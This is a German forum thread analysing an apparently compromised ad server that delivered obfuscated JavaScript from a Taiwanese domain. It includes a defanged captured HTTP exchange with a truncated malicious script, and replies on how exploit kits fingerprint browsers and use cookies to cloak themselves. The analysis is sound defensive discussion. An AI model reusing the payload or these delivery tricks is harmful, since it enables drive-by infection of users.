Hintergrund ist folgender Vorfall:
>> hxxp://lastchaos-forum.gamigo.de/showthread.php?t=143773
(Diskussionspunkt ist der Analyse-Post auf der ersten Thread-Seite.)


im Telegrammstil:
Ein AdServer eines deustchen Online-Spiele-Publisher wurde offensichtlich kompromitiert und hat per IFRAME Code von einer Taiwanesischen Server-Adresse nachgeladen. Inzwischen wird der Code-Sample von Kaspersky als MalWare geführt (CodeSample wurde bei verschienden AntVir-Firmen zur Untersuchung hochgeladen):

hxxp://www.virustotal.com/de/analisis/5cd62c77e76e60ed311e01044ef12234637bde1703d8bba903b1000c02e1968a-1269693888

Zur Diskussion:

Code wird versucht von h**p://notydivi.com.tw/entropy/index.php abzurufen.
In den weitaus meisten Fällen wird aber einfach ein http-location Redirect an "www.google.com" rückgemeldet (ca. 30x). Erst nach weiteren Spielereien z.B. mit dem http "User Agent" wurde obskurer Code ausgeliefert.

Anbei ein geglückter Code-Abruf über websniffer.net (-xxx- zur Sicherheit im Text)

Zitat:

Connect to 95.143.192.-xxx-142 on port 80 ... ok

GET /entropy/index.php HTTP/1.0[CRLF]
Host: notydivi.com.-xxx-tw[CRLF]
Connection: close[CRLF]
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)[CRLF]
Accept-Encoding: gzip[CRLF]
Accept-Charset: ISO-8859-1,UTF-8;q=0.7,*;q=0.7[CRLF]
Cache-Control: no[CRLF]
Accept-Language: de,en;q=0.7,en-us;q=0.3[CRLF]
Referer: hxxp://web-sniffer.net/[CRLF]
[CRLF]

HTTP Response Header
Name Value Delim
Status: HTTP/1.1 200 OK
Date: Mon, 22 Mar 2010 22:02:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Encoding: gzip
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content (encoded: 9.46 KiB / decoded: 15.13 KiB)

<body><p>42</p><script></script><script>kryue="0F191_1d1e2Z2[1b2_1`3+3K1H1W1Z3-1X2S2X1S1T2R2f1Q3P1O2U1M2g1K321I373E1D1E2Q3,1@1A2J 271>3Y1<3f1:333Q0W10152^133_113V3Z1.2c1

[.....]

document.body.appendChild(hvcqy);</script></body>

Hat jemand Erfahrung, nach welchen Kritierien solche Malware-Server Code ausliefern? Scheinbar erfolgt das "intelligent" - einmal Malware ausgeliefert, bekomme ich nur noch(?) Weiterleitungen auf "google.com"...


Hinweis zur Klarstellung: Der betroffene Publisher spricht von einem AdScript-Fehler und übersensiblen Virenscanner - es hätte keine Gefahr bestanden. Deshalb sollte meine Aussage hier auch kritisch betrachten.

Danke für den Hinweis...

Schätze mal, das die sehr bald Off gehen sollten und ihren Code überarbeiten werden.

Die stehen sich auch bald in der malwaredomainlist und dann ist schluss mit dem Bloodhound Exploid...^^

Hi,

so nen code ist "immer" intelligent, es hilft ja nichts wenn du ne Firefoxschwachstelle bei Opera auszunutzen versuchst.

In der Regel wird ein Arsenal an Exploits verwendet. Wenn du also erstmal die Werbung siehst dann wird schnell sortiert was für ein Browser, welche Version usw genutzt wird um möglichst direkt zum Ziel zu kommen. Meist werden einige Exploits durchlaufen bevor einer gefunden wird, für den du anfällig bist.

Um dich nach dem ersten Besuch immer zu google weiterzuleiten statt zu inifizieren reichet unter umständen ein einfaches cookie.

MfG myrtille